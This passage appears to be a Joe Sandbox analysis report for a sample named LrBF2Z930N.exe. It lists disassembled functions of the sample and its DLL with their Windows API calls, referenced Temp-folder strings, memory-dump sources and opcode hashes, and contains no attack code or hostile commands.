                                                                                      • Instruction ID: 96ce44ba598663215a9c0344f7f3be5f763e54424691629c90395ba3ac3a4ca6
                                                                                      • Opcode Fuzzy Hash: fcb2effe4c6ed3b6966d5c269c3ab42fb7af0b91e3e51c8dbbb25e37af794a25
                                                                                      • Instruction Fuzzy Hash: 3F512532D14109AECB509FE9C4806AEB7BFEB45314F138559D404B7218F772AD4DB7A1
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E3925C2
                                                                                        • Part of subcall function 6E3912CC: lstrcpynW.KERNEL32(00000000,?,6E39137F,00000019,6E3911CA,-000000A0), ref: 6E3912DC
                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 6E392548
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E392563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 0179bfe30d2fb03932c65ad251f4d06253c0de79b178afcca307a50b7eba1d22
                                                                                      • Instruction ID: 1ffdb7d8097001f4fe06ddabfd8b3855a43a65b657bf081002277a19cc5e0613
                                                                                      • Opcode Fuzzy Hash: 0179bfe30d2fb03932c65ad251f4d06253c0de79b178afcca307a50b7eba1d22
                                                                                      • Instruction Fuzzy Hash: 4241EFB1008B05EFD714DFA9E980A66B7BCFB45304F10495DE496C7280F732A549EBB1
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                      • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                                      • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                                                      • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                                      • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401E56
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 3808545654-0
                                                                                      • Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                                      • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                                                      • Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                                      • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E3922D8,?,00000808), ref: 6E3916D5
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E3922D8,?,00000808), ref: 6E3916DC
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E3922D8,?,00000808), ref: 6E3916F0
                                                                                      • GetProcAddress.KERNEL32(6E3922D8,00000000), ref: 6E3916F7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E391700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 2f5da836bc81d184990fbead037577483ed4a1ec71e883d514601a98da1ea761
                                                                                      • Instruction ID: bea623adbab317965d6b43732f03b54440af118f18940dc6cd12ec82badf197f
                                                                                      • Opcode Fuzzy Hash: 2f5da836bc81d184990fbead037577483ed4a1ec71e883d514601a98da1ea761
                                                                                      • Instruction Fuzzy Hash: 28F012721065387BDA2016A69C4CCABBE9CEF8B2F5B110255F6289129096624C02D7F1
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 0040600A
                                                                                      • CharNextW.USER32(00000000), ref: 0040600F
                                                                                      • CharNextW.USER32(00000000), ref: 00406027
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\nsk82C6.tmp, xrefs: 00405FFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp
                                                                                      • API String ID: 3213498283-487429065
                                                                                      • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                                      • Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
                                                                                      • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                                                      • Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-823278215
                                                                                      • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                      • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                                                      • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                      • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6E391171
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6E3911E3
                                                                                      • GlobalFree.KERNEL32 ref: 6E39124A
                                                                                      • GlobalFree.KERNEL32(?), ref: 6E39129B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E3912B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: f156e392f1741c7d39f381ecd2d1dd0e70fadc8d24a3688c3bcadcd8b0075f76
                                                                                      • Instruction ID: 91a5d9e76753062cc54b33f168e9c59d3993bef1218f677501da3dc526cd5785
                                                                                      • Opcode Fuzzy Hash: f156e392f1741c7d39f381ecd2d1dd0e70fadc8d24a3688c3bcadcd8b0075f76
                                                                                      • Instruction Fuzzy Hash: 9451B075900602EFEB00DFA8C884A6677ACFB0A316B124559F985EB350F732ED58DB60
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk82C6.tmp\System.dll), ref: 0040269A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp$C:\Users\user\AppData\Local\Temp\nsk82C6.tmp\System.dll
                                                                                      • API String ID: 1659193697-1052251146
                                                                                      • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                                      • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                                                      • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                                                      • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(000002DC,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
                                                                                      • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
                                                                                      • C:\Users\user\AppData\Local\Temp\nsk82C6.tmp, xrefs: 00403C98
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsk82C6.tmp
                                                                                      • API String ID: 2962429428-174354059
                                                                                      • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                                      • Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
                                                                                      • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                                      • Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9
                                                                                      APIs
                                                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 0040600A
                                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 004060B2
                                                                                      • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004060C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsk82C6.tmp
                                                                                      • API String ID: 3248276644-487429065
                                                                                      • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                                      • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                                                      • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                                      • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 004056AA
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                                                        • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                                      • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                                                      • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                                      • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3356406503-1824292864
                                                                                      • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                                      • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                                                      • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                                      • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LrBF2Z930N.exe,C:\Users\user\Desktop\LrBF2Z930N.exe,80000000,00000003), ref: 00405FA3
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LrBF2Z930N.exe,C:\Users\user\Desktop\LrBF2Z930N.exe,80000000,00000003), ref: 00405FB3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
